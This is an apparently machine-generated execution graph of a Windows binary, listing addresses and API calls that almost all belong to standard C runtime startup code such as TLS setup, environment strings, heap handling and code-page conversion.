                                                                                                                                      execution_graph 9755 6e1cec 9756 6e1cf8 ___scrt_is_nonwritable_in_current_image 9755->9756 9781 6e1f9e 9756->9781 9758 6e1cff 9759 6e1e58 9758->9759 9769 6e1d29 ___scrt_is_nonwritable_in_current_image __CreateFrameInfo ___scrt_release_startup_lock 9758->9769 9820 6e2237 IsProcessorFeaturePresent 9759->9820 9761 6e1e5f 9799 6e542f 9761->9799 9766 6e1d48 9767 6e1dc9 9792 6e5fa6 9767->9792 9769->9766 9769->9767 9802 6e5479 9769->9802 9771 6e1dcf 9796 6fe04b 9771->9796 9776 6e1df4 9777 6e1dfd 9776->9777 9811 6e545b 9776->9811 9814 6e1fd7 9777->9814 9782 6e1fa7 9781->9782 9827 6e2445 IsProcessorFeaturePresent 9782->9827 9786 6e1fb8 9787 6e1fbc 9786->9787 9837 6e33e7 9786->9837 9787->9758 9790 6e1fd3 9790->9758 9793 6e5faf 9792->9793 9794 6e5fb4 9792->9794 9909 6e60cf 9793->9909 9794->9771 10814 6fe000 GetModuleHandleA GetModuleFileNameA 9796->10814 11015 6e557a 9799->11015 9803 6e548f _unexpected 9802->9803 9804 6e67cb ___scrt_is_nonwritable_in_current_image 9802->9804 9803->9767 9805 6e729e _unexpected 39 API calls 9804->9805 9808 6e67dc 9805->9808 9806 6e6807 CallUnexpected 39 API calls 9807 6e6806 9806->9807 9808->9806 9809 6e21e4 GetModuleHandleW 9810 6e1df0 9809->9810 9810->9761 9810->9776 9812 6e557a __CreateFrameInfo 21 API calls 9811->9812 9813 6e5466 9812->9813 9813->9777 9815 6e1fe3 9814->9815 9819 6e1e06 9815->9819 11088 6e33f9 9815->11088 9817 6e1ff1 9818 6e2a86 ___scrt_uninitialize_crt 7 API calls 9817->9818 9818->9819 9819->9766 9821 6e224d __CreateFrameInfo 9820->9821 9822 6e22f8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9821->9822 9823 6e233c __CreateFrameInfo 9822->9823 9823->9761 9824 6e5445 9825 6e557a __CreateFrameInfo 21 API calls 9824->9825 9826 6e1e6d 9825->9826 9828 6e1fb3 9827->9828 9829 6e2a67 9828->9829 9846 6e69af 9829->9846 9832 6e2a70 9832->9786 9834 6e2a78 9835 6e2a83 9834->9835 9860 6e69eb 9834->9860 9835->9786 9900 6e838c 9837->9900 9840 6e2a86 9841 6e2a8f 9840->9841 9842 6e2a99 9840->9842 9843 6e687e ___vcrt_uninitialize_ptd 6 API calls 9841->9843 9842->9787 9844 6e2a94 9843->9844 9845 6e69eb ___vcrt_uninitialize_locks DeleteCriticalSection 9844->9845 9845->9842 9848 6e69b8 9846->9848 9849 6e69e1 9848->9849 9850 6e2a6c 9848->9850 9864 6ec588 9848->9864 9851 6e69eb ___vcrt_uninitialize_locks DeleteCriticalSection 9849->9851 9850->9832 9852 6e684b 9850->9852 9851->9850 9881 6ec499 9852->9881 9855 6e6860 9855->9834 9858 6e687b 9858->9834 9861 6e6a15 9860->9861 9862 6e69f6 9860->9862 9861->9832 9863 6e6a00 DeleteCriticalSection 9862->9863 9863->9861 9863->9863 9869 6ec61a 9864->9869 9867 6ec5c0 InitializeCriticalSectionAndSpinCount 9868 6ec5ab 9867->9868 9868->9848 9870 6ec5a2 9869->9870 9873 6ec63b 9869->9873 9870->9867 9870->9868 9871 6ec6a3 GetProcAddress 9871->9870 9873->9870 9873->9871 9874 6ec694 9873->9874 9876 6ec5cf LoadLibraryExW 9873->9876 9874->9871 9875 6ec69c FreeLibrary 9874->9875 9875->9871 9877 6ec616 9876->9877 9878 6ec5e6 GetLastError 9876->9878 9877->9873 9878->9877 9879 6ec5f1 ___vcrt_FlsSetValue 9878->9879 9879->9877 9880 6ec607 LoadLibraryExW 9879->9880 9880->9873 9882 6ec61a ___vcrt_FlsSetValue 5 API calls 9881->9882 9883 6ec4b3 9882->9883 9884 6ec4cc TlsAlloc 9883->9884 9885 6e6855 9883->9885 9885->9855 9886 6ec54a 9885->9886 9887 6ec61a ___vcrt_FlsSetValue 5 API calls 9886->9887 9888 6ec564 9887->9888 9889 6ec57f TlsSetValue 9888->9889 9890 6e686e 9888->9890 9889->9890 9890->9858 9891 6e687e 9890->9891 9892 6e6888 9891->9892 9893 6e688e 9891->9893 9895 6ec4d4 9892->9895 9893->9855 9896 6ec61a ___vcrt_FlsSetValue 5 API calls 9895->9896 9897 6ec4ee 9896->9897 9898 6ec506 TlsFree 9897->9898 9899 6ec4fa 9897->9899 9898->9899 9899->9893 9901 6e839c 9900->9901 9902 6e1fc5 9900->9902 9901->9902 9904 6e79c3 9901->9904 9902->9790 9902->9840 9905 6e79ca 9904->9905 9906 6e7a0d GetStdHandle 9905->9906 9907 6e7a6f 9905->9907 9908 6e7a20 GetFileType 9905->9908 9906->9905 9907->9901 9908->9905 9910 6e60d8 9909->9910 9913 6e60ee 9909->9913 9910->9913 9915 6e6010 9910->9915 9912 6e60e5 9912->9913 9932 6e61dd 9912->9932 9913->9794 9916 6e601c 9915->9916 9917 6e6019 9915->9917 9941 6e7b07 9916->9941 9917->9912 9922 6e602d 9968 6e8352 9922->9968 9923 6e6039 9974 6e60fb 9923->9974 9928 6e8352 __freea 14 API calls 9929 6e605d 9928->9929 9930 6e8352 __freea 14 API calls 9929->9930 9931 6e6063 9930->9931 9931->9912 9933 6e624e 9932->9933 9938 6e61ec 9932->9938 9933->9913 9934 6ebc8c WideCharToMultiByte ___scrt_uninitialize_crt 9934->9938 9935 6e8bb5 _unexpected 14 API calls 9935->9938 9936 6e6252 9937 6e8352 __freea 14 API calls 9936->9937 9937->9933 9938->9933 9938->9934 9938->9935 9938->9936 9940 6e8352 __freea 14 API calls 9938->9940 10533 6ebe5f 9938->10533 9940->9938 9942 6e6022 9941->9942 9943 6e7b10 9941->9943 9947 6ebd88 GetEnvironmentStringsW 9942->9947 9996 6e7359 9943->9996 9948 6e6027 9947->9948 9949 6ebda0 9947->9949 9948->9922 9948->9923 9950 6ebc8c ___scrt_uninitialize_crt WideCharToMultiByte 9949->9950 9951 6ebdbd 9950->9951 9952 6ebdc7 FreeEnvironmentStringsW 9951->9952 9953 6ebdd2 9951->9953 9952->9948 9954 6e8cfd __strnicoll 15 API calls 9953->9954 9955 6ebdd9 9954->9955 9956 6ebdf2 9955->9956 9957 6ebde1 9955->9957 9959 6ebc8c ___scrt_uninitialize_crt WideCharToMultiByte 9956->9959 9958 6e8352 __freea 14 API calls 9957->9958 9961 6ebde6 FreeEnvironmentStringsW 9958->9961 9960 6ebe02 9959->9960 9962 6ebe09 9960->9962 9963 6ebe11 9960->9963 9961->9948 9964 6e8352 __freea 14 API calls 9962->9964 9965 6e8352 __freea 14 API calls 9963->9965 9966 6ebe0f FreeEnvironmentStringsW 9964->9966 9965->9966 9966->9948 9969 6e835d RtlFreeHeap 9968->9969 9970 6e6033 9968->9970 9969->9970 9971 6e8372 GetLastError 9969->9971 9970->9912 9972 6e837f __dosmaperr 9971->9972 9973 6e8b05 __dosmaperr 12 API calls 9972->9973 9973->9970 9975 6e6110 9974->9975 9976 6e8bb5 _unexpected 14 API calls 9975->9976 9977 6e6137 9976->9977 9978 6e613f 9977->9978 9987 6e6149 9977->9987 9979 6e8352 __freea 14 API calls 9978->9979 9995 6e6040 9979->9995 9980 6e61a6 9981 6e8352 __freea 14 API calls 9980->9981 9981->9995 9982 6e8bb5 _unexpected 14 API calls 9982->9987 9983 6e61b5 10523 6e60a0 9983->10523 9987->9980 9987->9982 9987->9983 9988 6e61d0 9987->9988 9990 6e8352 __freea 14 API calls 9987->9990 10514 6e6955 9987->10514 10529 6e62e6 IsProcessorFeaturePresent 9988->10529 9989 6e8352 __freea 14 API calls 9992 6e61c2 9989->9992 9990->9987 9993 6e8352 __freea 14 API calls 9992->9993 9993->9995 9994 6e61dc 9995->9928 9997 6e736a 9996->9997 9998 6e7364 9996->9998 10002 6e7370 9997->10002 10048 6e6e8a 9997->10048 10043 6e6e4b 9998->10043 10004 6e7375 10002->10004 10065 6e6807 10002->10065 10021 6e7f4a 10004->10021 10006 6e7394 10008 6e739c 10006->10008 10009 6e73b1 10006->10009 10010 6e6e8a _unexpected 6 API calls 10008->10010 10011 6e6e8a _unexpected 6 API calls 10009->10011 10012 6e73a8 10010->10012 10013 6e73bd 10011->10013 10016 6e8352 __freea 14 API calls 10012->10016 10014 6e73d0 10013->10014 10015 6e73c1 10013->10015 10060 6e75af 10014->10060 10017 6e6e8a _unexpected 6 API calls 10015->10017 10016->10002 10017->10012 10020 6e8352 __freea 14 API calls 10020->10004 10022 6e7f74 10021->10022 10338 6e7dd6 10022->10338 10027 6e7fa6 10029 6e8352 __freea 14 API calls 10027->10029 10028 6e7fb4 10352 6e7bd1 10028->10352 10031 6e7f8d 10029->10031 10031->9942 10033 6e7fec 10034 6e8b05 __dosmaperr 14 API calls 10033->10034 10035 6e7ff1 10034->10035 10039 6e8352 __freea 14 API calls 10035->10039 10036 6e8033 10038 6e807c 10036->10038 10363 6e8305 10036->10363 10037 6e8007 10037->10036 10040 6e8352 __freea 14 API calls 10037->10040 10042 6e8352 __freea 14 API calls 10038->10042 10039->10031 10040->10036 10042->10031 10076 6e70b0 10043->10076 10046 6e6e82 TlsGetValue 10047 6e6e70 10047->9997 10049 6e70b0 _unexpected 5 API calls 10048->10049 10050 6e6ea6 10049->10050 10051 6e6eaf 10050->10051 10052 6e6ec4 TlsSetValue 10050->10052 10051->10002 10053 6e8bb5 10051->10053 10059 6e8bc2 _unexpected 10053->10059 10054 6e8c02 10094 6e8b05 10054->10094 10055 6e8bed HeapAlloc 10057 6e8c00 10055->10057 10055->10059 10057->10006 10059->10054 10059->10055 10091 6e5761 10059->10091 10131 6e7715 10060->10131 10233 6e8443 10065->10233 10068 6e6821 IsProcessorFeaturePresent 10071 6e682d 10068->10071 10070 6e6817 10070->10068 10075 6e6840 10070->10075 10263 6e631a 10071->10263 10072 6e5445 __CreateFrameInfo 21 API calls 10074 6e684a 10072->10074 10075->10072 10077 6e70e0 10076->10077 10081 6e6e67 10076->10081 10077->10081 10083 6e6fe5 10077->10083 10080 6e70fa GetProcAddress 10080->10081 10082 6e710a _unexpected 10080->10082 10081->10046 10081->10047 10082->10081 10089 6e6ff6 ___vcrt_FlsSetValue 10083->10089 10084 6e708c 10084->10080 10084->10081 10085 6e7014 LoadLibraryExW 10086 6e702f GetLastError 10085->10086 10087 6e7093 10085->10087 10086->10089 10087->10084 10088 6e70a5 FreeLibrary 10087->10088 10088->10084 10089->10084 10089->10085 10090 6e7062 LoadLibraryExW 10089->10090 10090->10087 10090->10089 10097 6e579c 10091->10097 10108 6e73ef GetLastError 10094->10108 10096 6e8b0a 10096->10057 10098 6e57a8 ___scrt_is_nonwritable_in_current_image 10097->10098 10103 6e720f EnterCriticalSection 10098->10103 10100 6e57b3 __CreateFrameInfo 10104 6e57ea 10100->10104 10103->10100 10107 6e7226 LeaveCriticalSection 10104->10107 10106 6e576c 10106->10059 10107->10106 10109 6e740b 10108->10109 10110 6e7405 10108->10110 10112 6e6e8a _unexpected 6 API calls 10109->10112 10114 6e740f SetLastError 10109->10114 10111 6e6e4b _unexpected 6 API calls 10110->10111 10111->10109 10113 6e7427 10112->10113 10113->10114 10115 6e8bb5 _unexpected 12 API calls 10113->10115 10114->10096 10117 6e743c 10115->10117 10118 6e7444 10117->10118 10119 6e7455 10117->10119 10120 6e6e8a _unexpected 6 API calls 10118->10120 10121 6e6e8a _unexpected 6 API calls 10119->10121 10122 6e7452 10120->10122 10123 6e7461 10121->10123 10127 6e8352 __freea 12 API calls 10122->10127 10124 6e747c 10123->10124 10125 6e7465 10123->10125 10128 6e75af _unexpected 12 API calls 10124->10128 10126 6e6e8a _unexpected 6 API calls 10125->10126 10126->10122 10127->10114 10129 6e7487 10128->10129 10130 6e8352 __freea 12 API calls 10129->10130 10130->10114 10132 6e7721 ___scrt_is_nonwritable_in_current_image 10131->10132 10145 6e720f EnterCriticalSection 10132->10145 10134 6e772b 10146 6e775b 10134->10146 10137 6e7767 10138 6e7773 ___scrt_is_nonwritable_in_current_image 10137->10138 10150 6e720f EnterCriticalSection 10138->10150 10140 6e777d 10151 6e7564 10140->10151 10142 6e7795 10155 6e77b5 10142->10155 10145->10134 10149 6e7226 LeaveCriticalSection 10146->10149 10148 6e761d 10148->10137 10149->10148 10150->10140 10152 6e7573 _unexpected 10151->10152 10154 6e759a _unexpected 10151->10154 10152->10154 10158 6ea9ae 10152->10158 10154->10142 10232 6e7226 LeaveCriticalSection 10155->10232 10157 6e73db 10157->10020 10159 6ea9c4 10158->10159 10161 6eaa2e 10158->10161 10159->10161 10166 6ea9f7 10159->10166 10169 6e8352 __freea 14 API calls 10159->10169 10162 6e8352 __freea 14 API calls 10161->10162 10185 6eaa7c 10161->10185 10163 6eaa50 10162->10163 10164 6e8352 __freea 14 API calls 10163->10164 10167 6eaa63 10164->10167 10165 6eaa19 10168 6e8352 __freea 14 API calls 10165->10168 10166->10165 10171 6e8352 __freea 14 API calls 10166->10171 10170 6e8352 __freea 14 API calls 10167->10170 10172 6eaa23 10168->10172 10174 6ea9ec 10169->10174 10175 6eaa71 10170->10175 10176 6eaa0e 10171->10176 10177 6e8352 __freea 14 API calls 10172->10177 10173 6eaaea 10178 6e8352 __freea 14 API calls 10173->10178 10186 6ea423 10174->10186 10181 6e8352 __freea 14 API calls 10175->10181 10214 6ea521 10176->10214 10177->10161 10184 6eaaf0 10178->10184 10180 6eaa8a 10180->10173 10183 6e8352 14 API calls __freea 10180->10183 10181->10185 10183->10180 10184->10154 10226 6eab48 10185->10226 10187 6ea434 10186->10187 10213 6ea51d 10186->10213 10188 6ea445 10187->10188 10189 6e8352 __freea 14 API calls 10187->10189 10190 6ea457 10188->10190 10191 6e8352 __freea 14 API calls 10188->10191 10189->10188 10192 6ea469 10190->10192 10194 6e8352 __freea 14 API calls 10190->10194 10191->10190 10193 6ea47b 10192->10193 10195 6e8352 __freea 14 API calls 10192->10195 10196 6ea48d 10193->10196 10197 6e8352 __freea 14 API calls 10193->10197 10194->10192 10195->10193 10198 6ea49f 10196->10198 10199 6e8352 __freea 14 API calls 10196->10199 10197->10196 10200 6ea4b1 10198->10200 10202 6e8352 __freea 14 API calls 10198->10202 10199->10198 10201 6ea4c3 10200->10201 10203 6e8352 __freea 14 API calls 10200->10203 10204 6ea4d5 10201->10204 10205 6e8352 __freea 14 API calls 10201->10205 10202->10200 10203->10201 10206 6ea4e7 10204->10206 10207 6e8352 __freea 14 API calls 10204->10207 10205->10204 10208 6ea4f9 10206->10208 10210 6e8352 __freea 14 API calls 10206->10210 10207->10206 10209 6ea50b 10208->10209 10211 6e8352 __freea 14 API calls 10208->10211 10212 6e8352 __freea 14 API calls 10209->10212 10209->10213 10210->10208 10211->10209 10212->10213 10213->10166 10215 6ea52e 10214->10215 10225 6ea586 10214->10225 10216 6ea53e 10215->10216 10217 6e8352 __freea 14 API calls 10215->10217 10218 6ea550 10216->10218 10219 6e8352 __freea 14 API calls 10216->10219 10217->10216 10220 6e8352 __freea 14 API calls 10218->10220 10221 6ea562 10218->10221 10219->10218 10220->10221 10222 6e8352 __freea 14 API calls 10221->10222 10224 6ea574 10221->10224 10222->10224 10223 6e8352 __freea 14 API calls 10223->10225 10224->10223 10224->10225 10225->10165 10227 6eab74 10226->10227 10228 6eab55 10226->10228 10227->10180 10228->10227 10229 6ea58a _unexpected 14 API calls 10228->10229 10230 6eab6e 10229->10230 10231 6e8352 __freea 14 API calls 10230->10231 10231->10227 10232->10157 10269 6e86c6 10233->10269 10236 6e846a 10239 6e8476 ___scrt_is_nonwritable_in_current_image 10236->10239 10237 6e73ef __dosmaperr 14 API calls 10246 6e84a7 __CreateFrameInfo 10237->10246 10238 6e84c6 10241 6e8b05 __dosmaperr 14 API calls 10238->10241 10239->10237 10239->10238 10240 6e84d8 __CreateFrameInfo 10239->10240 10239->10246 10242 6e850e __CreateFrameInfo 10240->10242 10283 6e720f EnterCriticalSection 10240->10283 10243 6e84cb 10241->10243 10248 6e854b 10242->10248 10249 6e8648 10242->10249 10259 6e8579 10242->10259 10280 6e62b9 10243->10280 10246->10238 10246->10240 10262 6e84b0 10246->10262 10248->10259 10284 6e729e GetLastError 10248->10284 10251 6e8653 10249->10251 10315 6e7226 LeaveCriticalSection 10249->10315 10253 6e5445 __CreateFrameInfo 21 API calls 10251->10253 10255 6e865b 10253->10255 10256 6e729e _unexpected 39 API calls 10260 6e85ce 10256->10260 10258 6e729e _unexpected 39 API calls 10258->10259 10311 6e85f4 10259->10311 10261 6e729e _unexpected 39 API calls 10260->10261 10260->10262 10261->10262 10262->10070 10264 6e6336 __CreateFrameInfo 10263->10264 10265 6e6362 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10264->10265 10266 6e6433 __CreateFrameInfo 10265->10266 10330 6e19a4 10266->10330 10268 6e6451 10268->10075 10270 6e86d2 ___scrt_is_nonwritable_in_current_image 10269->10270 10275 6e720f EnterCriticalSection 10270->10275 10272 6e86e0 10276 6e8722 10272->10276 10275->10272 10279 6e7226 LeaveCriticalSection 10276->10279 10278 6e680c 10278->10070 10278->10236 10279->10278 10316 6e6508 10280->10316 10282 6e62c5 10282->10262 10283->10242 10285 6e72ba 10284->10285 10286 6e72b4 10284->10286 10288 6e6e8a _unexpected 6 API calls 10285->10288 10290 6e72be SetLastError 10285->10290 10287 6e6e4b _unexpected 6 API calls 10286->10287 10287->10285 10289 6e72d6 10288->10289 10289->10290 10292 6e8bb5 _unexpected 14 API calls 10289->10292 10293 6e734e 10290->10293 10294 6e7353 10290->10294 10295 6e72eb 10292->10295 10293->10258 10296 6e6807 CallUnexpected 37 API calls 10294->10296 10297 6e7304 10295->10297 10298 6e72f3 10295->10298 10301 6e7358 10296->10301 10300 6e6e8a _unexpected 6 API calls 10297->10300 10299 6e6e8a _unexpected 6 API calls 10298->10299 10308 6e7301 10299->10308 10302 6e7310 10300->10302 10303 6e732b 10302->10303 10304 6e7314 10302->10304 10307 6e75af _unexpected 14 API calls 10303->10307 10305 6e6e8a _unexpected 6 API calls 10304->10305 10305->10308 10306 6e8352 __freea 14 API calls 10306->10290 10309 6e7336 10307->10309 10308->10306 10310 6e8352 __freea 14 API calls 10309->10310 10310->10290 10312 6e85f8 10311->10312 10313 6e85c0 10311->10313 10329 6e7226 LeaveCriticalSection 10312->10329 10313->10256 10313->10260 10313->10262 10315->10251 10317 6e651a __strnicoll 10316->10317 10320 6e6462 10317->10320 10319 6e6532 __strnicoll 10319->10282 10321 6e6479 10320->10321 10322 6e6472 10320->10322 10324 6e6487 10321->10324 10325 6e64df __strnicoll GetLastError SetLastError 10321->10325 10323 6e3920 __strnicoll 16 API calls 10322->10323 10323->10321 10324->10319 10326 6e64ae 10325->10326 10326->10324 10327 6e62e6 __strnicoll 11 API calls 10326->10327 10328 6e64de 10327->10328 10329->10313 10331 6e19ac 10330->10331 10332 6e19ad IsProcessorFeaturePresent 10330->10332 10331->10268 10334 6e1b19 10332->10334 10337 6e1bff SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10334->10337 10336 6e1bfc 10336->10268 10337->10336 10371 6e7b4f 10338->10371 10341 6e7e09 10343 6e7e20 10341->10343 10344 6e7e0e GetACP 10341->10344 10342 6e7df7 GetOEMCP 10342->10343 10343->10031 10345 6e8cfd 10343->10345 10344->10343 10346 6e8d3b 10345->10346 10350 6e8d0b _unexpected 10345->10350 10347 6e8b05 __dosmaperr 14 API calls 10346->10347 10349 6e7f9e 10347->10349 10348 6e8d26 RtlAllocateHeap 10348->10349 10348->10350 10349->10027 10349->10028 10350->10346 10350->10348 10351 6e5761 _unexpected 2 API calls 10350->10351 10351->10350 10353 6e7dd6 41 API calls 10352->10353 10354 6e7bf1 10353->10354 10355 6e7cf6 10354->10355 10356 6e7c2e IsValidCodePage 10354->10356 10362 6e7c49 __CreateFrameInfo 10354->10362 10357 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10355->10357 10356->10355 10358 6e7c40 10356->10358 10359 6e7dd4 10357->10359 10360 6e7c69 GetCPInfo 10358->10360 10358->10362 10359->10033 10359->10037 10360->10355 10360->10362 10411 6e8160 10362->10411 10364 6e8311 ___scrt_is_nonwritable_in_current_image 10363->10364 10488 6e720f EnterCriticalSection 10364->10488 10366 6e831b 10489 6e809f 10366->10489 10372 6e7b6d 10371->10372 10373 6e7b66 10371->10373 10372->10373 10374 6e729e _unexpected 39 API calls 10372->10374 10373->10341 10373->10342 10375 6e7b8e 10374->10375 10379 6e901d 10375->10379 10380 6e9030 10379->10380 10382 6e7ba4 10379->10382 10380->10382 10387 6eab79 10380->10387 10383 6e904a 10382->10383 10384 6e905d 10383->10384 10385 6e9072 10383->10385 10384->10385 10408 6e7af4 10384->10408 10385->10373 10388 6eab85 ___scrt_is_nonwritable_in_current_image 10387->10388 10389 6e729e _unexpected 39 API calls 10388->10389 10390 6eab8e 10389->10390 10391 6eabd4 10390->10391 10400 6e720f EnterCriticalSection 10390->10400 10391->10382 10393 6eabac 10401 6eabfa 10393->10401 10398 6e6807 CallUnexpected 39 API calls 10399 6eabf9 10398->10399 10400->10393 10402 6eabbd 10401->10402 10403 6eac08 _unexpected 10401->10403 10405 6eabd9 10402->10405 10403->10402 10404 6ea9ae _unexpected 14 API calls 10403->10404 10404->10402 10406 6e7226 __CreateFrameInfo LeaveCriticalSection 10405->10406 10407 6eabd0 10406->10407 10407->10391 10407->10398 10409 6e729e _unexpected 39 API calls 10408->10409 10410 6e7af9 10409->10410 10410->10385 10412 6e8188 GetCPInfo 10411->10412 10421 6e8251 10411->10421 10417 6e81a0 10412->10417 10412->10421 10413 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10415 6e8303 10413->10415 10415->10355 10422 6ea6ed 10417->10422 10420 6ec7ef 43 API calls 10420->10421 10421->10413 10423 6e7b4f __strnicoll 39 API calls 10422->10423 10424 6ea70d 10423->10424 10442 6ea7ee 10424->10442 10426 6ea7c1 10445 6ea6cd 10426->10445 10427 6ea73a 10427->10426 10430 6e8cfd __strnicoll 15 API calls 10427->10430 10432 6ea7c9 10427->10432 10433 6ea75f __CreateFrameInfo __alloca_probe_16 10427->10433 10428 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10431 6e8208 10428->10431 10430->10433 10437 6ec7ef 10431->10437 10432->10428 10433->10426 10434 6ea7ee __strnicoll MultiByteToWideChar 10433->10434 10435 6ea7a8 10434->10435 10435->10426 10436 6ea7af GetStringTypeW 10435->10436 10436->10426 10438 6e7b4f __strnicoll 39 API calls 10437->10438 10439 6ec802 10438->10439 10451 6ec838 10439->10451 10449 6ea818 10442->10449 10446 6ea6d9 10445->10446 10448 6ea6ea 10445->10448 10447 6e8352 __freea 14 API calls 10446->10447 10446->10448 10447->10448 10448->10432 10450 6ea80a MultiByteToWideChar 10449->10450 10450->10427 10452 6ec853 __strnicoll 10451->10452 10453 6ea7ee __strnicoll MultiByteToWideChar 10452->10453 10457 6ec897 10453->10457 10454 6eca12 10455 6e19a4 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 10454->10455 10456 6e8229 10455->10456 10456->10420 10457->10454 10458 6e8cfd __strnicoll 15 API calls 10457->10458 10460 6ec8bd __alloca_probe_16 10457->10460 10471 6ec965 10457->10471 10458->10460 10459 6ea6cd __freea 14 API calls 10459->10454 10461 6ea7ee __strnicoll MultiByteToWideChar 10460->10461 10460->10471 10462 6ec906 10461->10462 10462->10471 10479 6e6f17 10462->10479 10465 6ec93c 10470 6e6f17 6 API calls 10465->10470 10465->10471 10466 6ec974 10467 6ec9fd 10466->10467 10468 6e8cfd __strnicoll 15 API calls 10466->10468 10472 6ec986 __alloca_probe_16 10466->10472 10469 6ea6cd __freea 14 API calls 10467->10469 10468->10472 10469->10471 10470->10471 10471->10459 10472->10467 10473 6e6f17 6 API calls 10472->10473 10474 6ec9c9 10473->10474 10474->10467 10485 6ebc8c 10474->10485 10476 6ec9e3 10476->10467 10477 6ec9ec 10476->10477 10478 6ea6cd __freea 14 API calls 10477->10478 10478->10471 10480 6e7169 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 10479->10480 10481 6e6f22 10480->10481 10482 6e6f74 __strnicoll 5 API calls 10481->10482 10484 6e6f28 10481->10484 10483 6e6f68 LCMapStringW 10482->10483 10483->10484 10484->10465 10484->10466 10484->10471 10487 6ebc9f ___scrt_uninitialize_crt 10485->10487 10486 6ebcdd WideCharToMultiByte 10486->10476 10487->10486 10488->10366 10499 6e7a73 10489->10499 10491 6e80c1 10492 6e7a73 29 API calls 10491->10492 10493 6e80e0 10492->10493 10494 6e8107 10493->10494 10495 6e8352 __freea 14 API calls 10493->10495 10496 6e8346 10494->10496 10495->10494 10513 6e7226 LeaveCriticalSection 10496->10513 10498 6e8334 10498->10038 10500 6e7a84 10499->10500 10503 6e7a80 CatchGuardHandler 10499->10503 10501 6e7a8b 10500->10501 10505 6e7a9e __CreateFrameInfo 10500->10505 10502 6e8b05 __dosmaperr 14 API calls 10501->10502 10504 6e7a90 10502->10504 10503->10491 10506 6e62b9 __strnicoll 29 API calls 10504->10506 10505->10503 10507 6e7acc 10505->10507 10508 6e7ad5 10505->10508 10506->10503 10509 6e8b05 __dosmaperr 14 API calls 10507->10509 10508->10503 10511 6e8b05 __dosmaperr 14 API calls 10508->10511 10510 6e7ad1 10509->10510 10512 6e62b9 __strnicoll 29 API calls 10510->10512 10511->10510 10512->10503 10513->10498 10515 6e6971 10514->10515 10516 6e6963 10514->10516 10517 6e8b05 __dosmaperr 14 API calls 10515->10517 10516->10515 10521 6e6989 10516->10521 10518 6e6979 10517->10518 10520 6e62b9 __strnicoll 29 API calls 10518->10520 10519 6e6983 10519->9987 10520->10519 10521->10519 10522 6e8b05 __dosmaperr 14 API calls 10521->10522 10522->10518 10524 6e60ca 10523->10524 10525 6e60ad 10523->10525 10524->9989 10526 6e60c4 10525->10526 10527 6e8352 __freea 14 API calls 10525->10527 10528 6e8352 __freea 14 API calls 10526->10528 10527->10525 10528->10524 10530 6e62f2 10529->10530 10531 6e631a __CreateFrameInfo 8 API calls 10530->10531 10532 6e6307 GetCurrentProcess TerminateProcess 10531->10532 10532->9994 10534 6ebe6a 10533->10534 10535 6ebe7b 10534->10535 10538 6ebe8e ___from_strstr_to_strchr 10534->10538 10536 6e8b05 __dosmaperr 14 API calls 10535->10536 10537 6ebe80 10536->10537 10537->9938 10539 6ec0a5 10538->10539 10540 6ebeae 10538->10540 10541 6e8b05 __dosmaperr 14 API calls 10539->10541 10596 6ec0ca 10540->10596 10543 6ec0aa 10541->10543 10545 6e8352 __freea 14 API calls 10543->10545 10545->10537 10546 6ebef4 10550 6e8bb5 _unexpected 14 API calls 10546->10550 10563 6ebede 10546->10563 10548 6ebed0 10556 6ebeed 10548->10556 10557 6ebed9 10548->10557 10553 6ebf02 10550->10553 10551 6e8352 __freea 14 API calls 10551->10537 10552 6ebfb2 10552->10563 10564 6ebba2 32 API calls 10552->10564 10555 6e8352 __freea 14 API calls 10553->10555 10554 6ebf67 10559 6e8352 __freea 14 API calls 10554->10559 10562 6ebf0d 10555->10562 10558 6ec0ca 39 API calls 10556->10558 10560 6e8b05 __dosmaperr 14 API calls 10557->10560 10561 6ebef2 10558->10561 10568 6ebf6f 10559->10568 10560->10563 10561->10563 10600 6ec0e4 10561->10600 10562->10561 10562->10563 10566 6e8bb5 _unexpected 14 API calls 10562->10566 10563->10551 10565 6ebfe0 10564->10565 10567 6e8352 __freea 14 API calls 10565->10567 10570 6ebf29 10566->10570 10573 6ebf9c 10567->10573 10568->10573 10604 6ebba2 10568->10604 10569 6ec09a 10571 6e8352 __freea 14 API calls 10569->10571 10574 6e8352 __freea 14 API calls 10570->10574 10571->10537 10573->10563 10573->10569 10573->10573 10577 6e8bb5 _unexpected 14 API calls 10573->10577 10574->10561 10575 6ebf93 10576 6e8352 __freea 14 API calls 10575->10576 10576->10573 10578 6ec02b 10577->10578 10579 6ec03b 10578->10579 10580 6ec033 10578->10580 10582 6e6955 ___std_exception_copy 29 API calls 10579->10582 10581 6e8352 __freea 14 API calls 10580->10581 10581->10563 10583 6ec047 10582->10583 10584 6ec04e 10583->10584 10585 6ec0bf 10583->10585 10613 6f141c 10584->10613 10586 6e62e6 __strnicoll 11 API calls 10585->10586 10588 6ec0c9 10586->10588 10590 6ec094 10592 6e8352 __freea 14 API calls 10590->10592 10591 6ec075 10593 6e8b05 __dosmaperr 14 API calls 10591->10593 10592->10569 10594 6ec07a 10593->10594 10595 6e8352 __freea 14 API calls 10594->10595 10595->10563 10597 6ec0d7 10596->10597 10598 6ebeb9 10596->10598 10628 6ec139 10597->10628 10598->10546 10598->10548 10598->10561 10601 6ec0fa 10600->10601 10603 6ebf57 10600->10603 10601->10603 10643 6f132b 10601->10643 10603->10552 10603->10554 10605 6ebbaf 10604->10605 10606 6ebbca 10604->10606 10605->10606 10607 6ebbbb 10605->10607 10608 6ebbd9 10606->10608 10743 6f1158 10606->10743 10609 6e8b05 __dosmaperr 14 API calls 10607->10609 10750 6f118b 10608->10750 10612 6ebbc0 __CreateFrameInfo 10609->10612 10612->10575 10762 6eac74 10613->10762 10618 6f148f 10620 6e8352 __freea 14 API calls 10618->10620 10621 6f149b 10618->10621 10619 6eac74 39 API calls 10622 6f146c 10619->10622 10620->10621 10624 6e8352 __freea 14 API calls 10621->10624 10626 6ec06f 10621->10626 10623 6ead0c 17 API calls 10622->10623 10625 6f1479 10623->10625 10624->10626 10625->10618 10627 6f1483 SetEnvironmentVariableW 10625->10627 